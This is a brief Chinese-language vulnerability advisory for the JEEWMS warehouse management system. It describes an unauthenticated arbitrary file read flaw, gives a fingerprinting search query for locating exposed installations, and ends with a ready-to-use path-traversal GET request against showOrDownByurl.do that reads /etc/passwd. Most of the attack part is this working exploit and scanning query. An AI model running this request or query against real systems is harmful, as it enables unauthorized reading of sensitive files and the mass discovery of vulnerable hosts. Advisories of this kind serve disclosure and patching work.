产品简介
JEEWMS基于JAVA的仓库管理系统(支持3PL(三方物流)和厂内物流),包含PDA端和WEB端,功能涵盖WMS,OMS,BMS(计费管理系统),TMS,成功应用于多家国内知名大客户,客户群体:冷链,干仓,快消品,汽车主机厂和配件厂等行业。
漏洞概述
JEEWMS存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞读取任意文件,造成敏感信息泄露。
测绘语句
body=”plug-in/lhgDialog/lhgdialog.min.js?skin=metro” && body=”仓库管理系统”
漏洞POC
GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd